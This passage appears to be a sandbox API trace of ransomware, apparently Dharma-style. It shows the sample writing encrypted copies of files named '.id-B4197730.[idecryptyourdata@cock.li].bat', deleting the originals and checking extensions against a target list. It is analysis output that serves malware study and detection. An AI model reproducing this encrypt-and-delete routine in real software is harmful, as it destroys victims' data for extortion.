hTemplateFile=0x0) returned 0x2d0 [0045.885] GetLastError () returned 0x0 [0045.885] ReadFile (in: hFile=0x2c8, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x133, lpOverlapped=0x0) returned 1 [0045.938] WriteFile (in: hFile=0x2d0, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x140, lpOverlapped=0x0) returned 1 [0045.946] ReadFile (in: hFile=0x2c8, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0045.946] WriteFile (in: hFile=0x2d0, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xf6, lpOverlapped=0x0) returned 1 [0045.946] SetEndOfFile (hFile=0x2d0) returned 1 [0045.947] CloseHandle (hObject=0x2d0) returned 1 [0045.947] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0045.947] SetEndOfFile (hFile=0x2c8) returned 1 [0045.948] CloseHandle (hObject=0x2c8) returned 1 [0045.948] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0045.949] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd")) returned 1 [0045.949] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.949] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.949] lstrlenW (lpString=".doc") returned 4 [0045.949] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0045.949] lstrlenW (lpString=".docx") returned 5 [0045.949] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0045.949] lstrlenW (lpString=".pdf") returned 4 [0045.949] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0045.949] lstrlenW (lpString=".xls") returned 4 [0045.949] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0045.949] lstrlenW (lpString=".xlsx") returned 5 [0045.949] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0045.949] lstrlenW (lpString=".ppt") returned 4 [0045.950] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0045.950] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.950] lstrlenW (lpString=".zip") returned 4 [0045.950] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0045.950] lstrlenW (lpString=".rar") returned 4 [0045.950] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0045.950] lstrlenW (lpString=".bz2") returned 4 [0045.950] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0045.950] lstrlenW (lpString=".7z") returned 3 [0045.950] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0045.950] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.950] lstrlenW (lpString=".dbf") returned 4 [0045.950] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0045.950] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.950] lstrlenW (lpString=".1cd") returned 4 [0045.950] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0045.950] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.950] lstrlenW (lpString=".jpg") returned 4 [0045.950] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0045.950] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.950] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.950] lstrlenW (lpString=".doc") returned 4 [0045.950] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0045.950] lstrlenW (lpString=".docx") returned 5 [0045.950] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0045.950] lstrlenW (lpString=".pdf") returned 4 [0045.950] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0045.950] lstrlenW (lpString=".xls") returned 4 [0045.951] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0045.951] lstrlenW (lpString=".xlsx") returned 5 [0045.951] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0045.951] lstrlenW (lpString=".ppt") returned 4 [0045.951] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0045.951] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.951] lstrlenW (lpString=".zip") returned 4 [0045.951] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0045.951] lstrlenW (lpString=".rar") returned 4 [0045.951] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0045.951] lstrlenW (lpString=".bz2") returned 4 [0045.951] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0045.951] lstrlenW (lpString=".7z") returned 3 [0045.951] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0045.951] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.951] lstrlenW (lpString=".dbf") returned 4 [0045.951] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0045.951] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.951] lstrlenW (lpString=".1cd") returned 4 [0045.951] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0045.951] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0045.951] lstrlenW (lpString=".jpg") returned 4 [0045.951] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0045.951] lstrcmpiW (lpString1=".MARKER", lpString2=".bat") returned 1 [0045.951] lstrlenW (lpString="$WINRE_BACKUP_PARTITION.MARKER") returned 30 [0045.952] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.344] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=0) returned 1 [0046.344] CloseHandle (hObject=0x2d0) returned 1 [0046.345] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.345] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.345] lstrlenW (lpString=".doc") returned 4 [0046.345] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0046.345] lstrlenW (lpString=".docx") returned 5 [0046.345] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0046.345] lstrlenW (lpString=".pdf") returned 4 [0046.345] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0046.345] lstrlenW (lpString=".xls") returned 4 [0046.345] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0046.345] lstrlenW (lpString=".xlsx") returned 5 [0046.345] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0046.345] lstrlenW (lpString=".ppt") returned 4 [0046.345] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0046.345] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.345] lstrlenW (lpString=".zip") returned 4 [0046.345] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0046.345] lstrlenW (lpString=".rar") returned 4 [0046.345] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0046.345] lstrlenW (lpString=".bz2") returned 4 [0046.345] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0046.345] lstrlenW (lpString=".7z") returned 3 [0046.345] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0046.345] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.345] lstrlenW (lpString=".dbf") returned 4 [0046.345] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0046.345] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.345] lstrlenW (lpString=".1cd") returned 4 [0046.345] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0046.345] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.345] lstrlenW (lpString=".jpg") returned 4 [0046.345] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0046.346] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.346] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.346] lstrlenW (lpString=".doc") returned 4 [0046.346] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0046.346] lstrlenW (lpString=".docx") returned 5 [0046.346] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0046.346] lstrlenW (lpString=".pdf") returned 4 [0046.346] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0046.346] lstrlenW (lpString=".xls") returned 4 [0046.346] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0046.346] lstrlenW (lpString=".xlsx") returned 5 [0046.346] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0046.346] lstrlenW (lpString=".ppt") returned 4 [0046.346] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0046.346] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.346] lstrlenW (lpString=".zip") returned 4 [0046.346] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0046.346] lstrlenW (lpString=".rar") returned 4 [0046.346] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0046.346] lstrlenW (lpString=".bz2") returned 4 [0046.346] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0046.346] lstrlenW (lpString=".7z") returned 3 [0046.346] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0046.346] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.346] lstrlenW (lpString=".dbf") returned 4 [0046.346] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0046.346] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.346] lstrlenW (lpString=".1cd") returned 4 [0046.346] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0046.346] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0046.346] lstrlenW (lpString=".jpg") returned 4 [0046.346] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0046.347] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.347] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.347] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.368] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=17240) returned 1 [0046.368] CloseHandle (hObject=0x2d0) returned 1 [0046.368] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll")) returned 0x80 [0046.368] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.368] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.368] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.368] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.368] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0046.438] GetLastError () returned 0x0 [0046.438] ReadFile (in: hFile=0x2d0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x4358, lpOverlapped=0x0) returned 1 [0046.455] WriteFile (in: hFile=0x2dc, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x4360, lpOverlapped=0x0) returned 1 [0046.456] ReadFile (in: hFile=0x2d0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.456] WriteFile (in: hFile=0x2dc, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.456] SetEndOfFile (hFile=0x2dc) returned 1 [0046.456] CloseHandle (hObject=0x2dc) returned 1 [0046.457] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.457] SetEndOfFile (hFile=0x2d0) returned 1 [0046.458] CloseHandle (hObject=0x2d0) returned 1 [0046.458] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.458] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll")) returned 1 [0046.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.458] lstrlenW (lpString=".doc") returned 4 [0046.458] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.458] lstrlenW (lpString=".docx") returned 5 [0046.458] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.459] lstrlenW (lpString=".pdf") returned 4 [0046.459] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.459] lstrlenW (lpString=".xls") returned 4 [0046.459] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.459] lstrlenW (lpString=".xlsx") returned 5 [0046.459] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.459] lstrlenW (lpString=".ppt") returned 4 [0046.459] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.459] lstrlenW (lpString=".zip") returned 4 [0046.459] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.459] lstrlenW (lpString=".rar") returned 4 [0046.459] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.459] lstrlenW (lpString=".bz2") returned 4 [0046.459] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.459] lstrlenW (lpString=".7z") returned 3 [0046.459] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.459] lstrlenW (lpString=".dbf") returned 4 [0046.459] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.459] lstrlenW (lpString=".1cd") returned 4 [0046.459] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.459] lstrlenW (lpString=".jpg") returned 4 [0046.459] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.459] lstrlenW (lpString=".doc") returned 4 [0046.459] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.459] lstrlenW (lpString=".docx") returned 5 [0046.459] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.459] lstrlenW (lpString=".pdf") returned 4 [0046.459] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.459] lstrlenW (lpString=".xls") returned 4 [0046.459] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.460] lstrlenW (lpString=".xlsx") returned 5 [0046.460] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.460] lstrlenW (lpString=".ppt") returned 4 [0046.460] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.460] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.460] lstrlenW (lpString=".zip") returned 4 [0046.460] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.460] lstrlenW (lpString=".rar") returned 4 [0046.460] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.460] lstrlenW (lpString=".bz2") returned 4 [0046.460] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.460] lstrlenW (lpString=".7z") returned 3 [0046.460] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.460] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.460] lstrlenW (lpString=".dbf") returned 4 [0046.460] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.460] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.460] lstrlenW (lpString=".1cd") returned 4 [0046.460] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.460] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0046.460] lstrlenW (lpString=".jpg") returned 4 [0046.460] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.460] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.460] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.460] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.460] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=18264) returned 1 [0046.460] CloseHandle (hObject=0x2d0) returned 1 [0046.461] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll")) returned 0x80 [0046.461] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.461] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.461] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.461] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.461] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.471] GetLastError () returned 0x0 [0046.471] ReadFile (in: hFile=0x2d0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x4758, lpOverlapped=0x0) returned 1 [0046.474] WriteFile (in: hFile=0x2c8, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x4760, lpOverlapped=0x0) returned 1 [0046.475] ReadFile (in: hFile=0x2d0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.475] WriteFile (in: hFile=0x2c8, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.475] SetEndOfFile (hFile=0x2c8) returned 1 [0046.475] CloseHandle (hObject=0x2c8) returned 1 [0046.476] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.476] SetEndOfFile (hFile=0x2d0) returned 1 [0046.477] CloseHandle (hObject=0x2d0) returned 1 [0046.477] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.477] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll")) returned 1 [0046.477] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.477] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.477] lstrlenW (lpString=".doc") returned 4 [0046.477] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.477] lstrlenW (lpString=".docx") returned 5 [0046.477] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.477] lstrlenW (lpString=".pdf") returned 4 [0046.477] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.477] lstrlenW (lpString=".xls") returned 4 [0046.477] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.477] lstrlenW (lpString=".xlsx") returned 5 [0046.477] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.477] lstrlenW (lpString=".ppt") returned 4 [0046.478] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.478] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.478] lstrlenW (lpString=".zip") returned 4 [0046.478] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.478] lstrlenW (lpString=".rar") returned 4 [0046.478] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.478] lstrlenW (lpString=".bz2") returned 4 [0046.478] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.478] lstrlenW (lpString=".7z") returned 3 [0046.478] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.478] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.478] lstrlenW (lpString=".dbf") returned 4 [0046.478] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.478] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.478] lstrlenW (lpString=".1cd") returned 4 [0046.478] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.478] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.478] lstrlenW (lpString=".jpg") returned 4 [0046.478] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.478] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.478] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.478] lstrlenW (lpString=".doc") returned 4 [0046.478] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.478] lstrlenW (lpString=".docx") returned 5 [0046.478] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.478] lstrlenW (lpString=".pdf") returned 4 [0046.478] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.478] lstrlenW (lpString=".xls") returned 4 [0046.478] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.478] lstrlenW (lpString=".xlsx") returned 5 [0046.478] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.478] lstrlenW (lpString=".ppt") returned 4 [0046.478] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.478] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.479] lstrlenW (lpString=".zip") returned 4 [0046.479] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.479] lstrlenW (lpString=".rar") returned 4 [0046.479] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.479] lstrlenW (lpString=".bz2") returned 4 [0046.479] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.479] lstrlenW (lpString=".7z") returned 3 [0046.479] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.479] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.479] lstrlenW (lpString=".dbf") returned 4 [0046.479] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.833] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.833] lstrlenW (lpString=".1cd") returned 4 [0046.833] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.833] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0046.833] lstrlenW (lpString=".jpg") returned 4 [0046.833] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 